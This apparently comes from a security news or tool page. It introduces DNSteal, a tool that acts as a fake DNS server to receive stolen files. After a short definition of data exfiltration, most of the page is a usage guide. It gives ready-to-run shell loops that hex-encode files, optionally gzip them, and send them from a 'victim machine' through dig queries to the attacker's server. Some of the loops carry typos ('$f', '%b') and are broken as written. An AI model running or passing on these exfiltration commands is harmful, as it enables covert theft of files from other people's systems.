Data exfiltration is sometimes referred to as data extrusion, data exportation, or data theft. All of these terms are used to describe the unauthorized transfer of data from a computer or other device.
Data exfiltration can be conducted manually, by an individual with physical access to a computer, but it can also be an automated process conducted through malicious programming over a network.
Generally, data exfiltration is a form of a security breach that occurs when data is downloaded or uploaded from a computer or server without authorization.These attacks are primarily intented so as to gain access to a network or machine's data.
Data exfiltration can be done using various method such as by installing remote applications , removable media device , social engineering techniques or phishing emails.
But a new type of data exfiltration tool named "DNSteal" is released which is programmed to send files over to a remote machine via dns request.
DNSteal is a Data Exfiltration Tool that works stealthily for sending files over DNS requests. Once install and run it acts as a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.
Here's an example on how to use this tool
Usage:
On the victim machine, you simply send the following command:
for b in $(xxd -p file/to/send.png); do dig @server $b.filename.com; done
Support for multiple files
for filename in $(ls); do for b in $(xxd -p $f); do dig +short @server %b.$filename.com; done; done
It also supports gzip compression of the file to allow for faster transfer speeds, this can be achieved using the "-z" switch:
python dnsteal.py 127.0.0.1 -z
Then on the victim machine send a Gzipped file like so:
for b in $(gzip -c file/to/send.png | xxd -p); do dig @server $b.filename.com; done
or for multiple, gzip compressed files:
for filename in $(ls); do for b in $(gzip -c $filename | xxd -p); do dig +short @server %b.$filename.com; done; done
